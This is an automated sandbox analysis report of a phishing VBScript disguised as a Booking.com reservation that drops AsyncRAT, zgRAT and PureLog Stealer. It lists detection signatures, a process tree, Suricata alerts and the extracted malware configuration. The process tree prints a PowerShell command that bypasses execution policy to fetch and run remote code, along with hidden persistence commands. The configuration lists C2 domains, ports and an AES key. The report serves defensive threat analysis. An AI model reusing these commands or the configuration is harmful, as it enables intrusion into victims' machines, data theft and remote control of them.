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Analysis Report
Reservation Detail Booking.com ID4336.vbs
General Information
AsyncRAT, PureLog Stealer, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to many different domains
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
- System is w10x64
- wscript.exe (PID: 1396 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Reser vation Det ail Bookin g.com ID43 36.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - chrome.exe (PID: 4440 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// account.bo oking.com/ sign-in?op _token=EgV vYXV0aCKyA QoUNlo3Mm9 IT2QzNk5uN 3prM3Bpcmg SCWF1dGhvc ml6ZRoaaHR 0cHM6Ly9hZ G1pbi5ib29 raW5nLmNvb S8qOnsiYXV 0aF9hdHRlb XB0X2lkIjo iNjA5OWJhN DYtYTgzOC0 0MjcwLTkzZ DItNmRiZTU 1OTBhY2RiI n0yK2VjT2J XVUQwcnFzM E1CN080Wmh OMTJJMVFlV FFKTlBZaU4 zVnpCLWtKW Wc6BFMyNTZ CBGNvZGUqE zDd_v3Czqg nOgBCAFiir cu5qTI MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 4160 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2112 --fi eld-trial- handle=198 4,i,976238 3119870313 274,999245 7861724981 690,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7984 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= audio.mojo m.AudioSer vice --lan g=en-US -- service-sa ndbox-type =audio --m ojo-platfo rm-channel -handle=40 08 --field -trial-han dle=1984,i ,976238311 9870313274 ,999245786 1724981690 ,262144 -- disable-fe atures=Opt imizationG uideModelD ownloading ,Optimizat ionHints,O ptimizatio nHintsFetc hing,Optim izationTar getPredict ion /prefe tch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8068 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= video_capt ure.mojom. VideoCaptu reService --lang=en- US --servi ce-sandbox -type=none --mojo-pl atform-cha nnel-handl e=5528 --f ield-trial -handle=19 84,i,97623 8311987031 3274,99924 5786172498 1690,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - powershell.exe (PID: 4592 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass [scrip tblock]::C reate((Inv oke-WebReq uest 'http s://skynet x.com.br/l icense/2/i mage.txt') .Content). Invoke(); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 3208 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \1tron.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7492 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\Public\1 tron.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8116 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5676 cmdline:
powershell .e"xe" -No Profile -W indowStyle Hidden -E xecutionPo licy Bypas s -File "C :\Users\Pu blic\1tron .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - aspnet_regbrowsers.exe (PID: 360 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF) - wscript.exe (PID: 2292 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \1tron.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2820 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\Public\1 tron.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6256 cmdline:
powershell .e"xe" -No Profile -W indowStyle Hidden -E xecutionPo licy Bypas s -File "C :\Users\Pu blic\1tron .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - aspnet_regbrowsers.exe (PID: 5292 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF) - wscript.exe (PID: 5384 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \1tron.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2448 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\Public\1 tron.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6824 cmdline:
powershell .e"xe" -No Profile -W indowStyle Hidden -E xecutionPo licy Bypas s -File "C :\Users\Pu blic\1tron .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - aspnet_regbrowsers.exe (PID: 3224 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)
- svchost.exe (PID: 2724 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 3424 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \Desktop.i ni.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4752 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\Public\1 tron.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2608 cmdline:
powershell .e"xe" -No Profile -W indowStyle Hidden -E xecutionPo licy Bypas s -File "C :\Users\Pu blic\1tron .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - aspnet_regbrowsers.exe (PID: 1532 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_regbro wsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
{"Server": "cdt2023.ddns.net,chromedata.accesscam.org,chromedata.webredirect.org,cepas2023.duckdns.org,,", "Ports": "6606,7707,8808,3313,3314,9441,9442,9443,2900,1018,2019,2020,2021,5155,6666,9999,5505", "Version": "AWS | 3Losh", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "svchost.exe", "AES_key": "JrdGtXYbFZXroXsLKqc1s0Y7ardm5xKr", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "false", "BDOS": "null", "Startup_Delay": "3", "HWID": "1PsVeBGAIf/bjOA2Sw+olEA6i2wbuUnZObLDhhgCdzg/2qM0jZCPw4wyv1dfaJyo4fsjMV9+iRUpHVuc9A51gw==", "Certificate": "MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhY+g1tekZ8/F29gsEIDgf/8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMw/Vwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51/SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXL/hXoE/wCzwzvU/CrzPXd3uMsLfFMDHZJ+OQ9OXKU/CHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3/ingNFaTyYmGsmLIE2Jq5AR1A+xA+FEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICt+J8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4/RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8+hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd/62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNt/CjnlaMc40DJ+HlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6/xZCPjr22V/xZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWT/nKuRvIEYU4Ra+B39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7/kVfIYuRxl+YefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWN/Fm+lzF3THeHU6vNJ+5UoAWHYFW8wfJCbzQ/0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckUL/lEf4Y92uJVKvLGruQt/mtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv+36kLKhgIJlqC7Xx/PVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV/3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWS/JykARBv9o2BjL/PTADfwAtc1b4nWo0l+CI8IjjYXu/mJOuwR+kFJ19INtwbffQvT9U12t4smpcZV+OK0opk4Yr9r1tZYm92ghXA==", "ServerSignature": "ic1DyM98ThqA6W2quqV+4LtfJL93dIPZS9ORFCy3Aprb6+WEKwwt1rsgZ5Ra84KjlL9Qa88G83c8kVnI84q94Pt3yoFXOP+06YX+cvIwpMLeSECugCoIf9BDNv9FHA03mf8gBf8fw+wvJQHAorEzuWYCKrGzjCAEyQvLrOQffSlxp6Pip/VkfA2/w87zTcFF+HKZJ1E4sZK+ynabafUM5NgzmlxoVlvzKwQzxezL+uDVVvK90uUPPxo1PErATFzfRlxGVkThWMeHjqYsmcK9RLrifGf86MzMqBkC96HVSqJJuzZrlsYqniXRgwINZzvUvMepaID9ZrkBZzQ/GHUCmuM1LPtBEdaUrLvz+CZ9XZGNpClcDRV3348YVJMZzmIFFQn303j1p47paukKSBC45LW7y1IkZ8wCgOrmsYimSDicAd2PVsAB0TAzhHi+0z0o5nIiHRcVzK93H7uZDQxZBSUp9SoLaeEHbOsjBfDZL2mQik2zmd3GqGUmbxEck75N7pHNpXlUFPib2GE1wR0cG4HDlLRC8KcdStBF6RYxwe0Cp2tgQsgzsKAZbHYspuOxcN9JJRUD+f8k49WccUjJGJ4WzBnporak6mgf0cM2IvVnbs6SKTWkyKSRy8SQhy4evaCD/sCGzE+S9jARvJAFIWIzuZDMI/foGKxjBO/n53Q=", "Group": "FOCO-WINPAX"}
Source | Rule | Description | Author | Strings |
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
Source | Rule | Description | Author | Strings |
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
Source | Rule | Description | Author | Strings |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown |
| |
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
| |
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown |
| |
Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown |
| |
Click to see the 37 entries |
Source | Rule | Description | Author | Strings |
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Data Obfuscation |
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:00:19.942007+0100 | 2022930 | 1 | A Network Trojan was detected | | 443 | | 49784 | TCP |
2024-11-02T14:01:01.611294+0100 | 2022930 | 1 | A Network Trojan was detected | | 443 | | 50262 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:01:28.787515+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | | 9443 | | 50448 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:01:28.787515+0100 | 2035607 | 1 | Domain Observed Used for C2 Detected | | 9443 | | 50448 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:00:54.068900+0100 | 2009208 | 1 | A Network Trojan was detected | | 60294 | | 3478 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:00:54.687532+0100 | 2009205 | 1 | A Network Trojan was detected | | 60296 | | 3478 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:00:44.038228+0100 | 2009207 | 1 | A Network Trojan was detected | | 60294 | | 3478 | UDP |
2024-11-02T14:01:35.148001+0100 | 2009207 | 1 | A Network Trojan was detected | | 60296 | | 3478 | UDP |
2024-11-02T14:02:17.024552+0100 | 2009207 | 1 | A Network Trojan was detected | | 60294 | | 3478 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:01:28.787515+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | | 9443 | | 50448 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-11-02T14:00:11.036643+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49738 | | 443 | TCP |
2024-11-02T14:00:12.281193+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49746 | | 443 | TCP |
2024-11-02T14:00:13.550368+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49751 | | 443 | TCP |
2024-11-02T14:00:14.774550+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49754 | | 443 | TCP |
2024-11-02T14:00:16.069926+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49759 | | 443 | TCP |
2024-11-02T14:00:17.303531+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49767 | | 443 | TCP |
2024-11-02T14:00:18.644570+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49782 | | 443 | TCP |
2024-11-02T14:00:19.922908+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49787 | | 443 | TCP |
2024-11-02T14:00:21.141168+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49795 | | 443 | TCP |
2024-11-02T14:00:23.059767+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49803 | | 443 | TCP |
2024-11-02T14:00:25.520046+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49832 | | 443 | TCP |
2024-11-02T14:00:27.886540+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49883 | | 443 | TCP |
2024-11-02T14:00:29.729447+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49918 | | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
Source: | Malware Configuration Extractor: |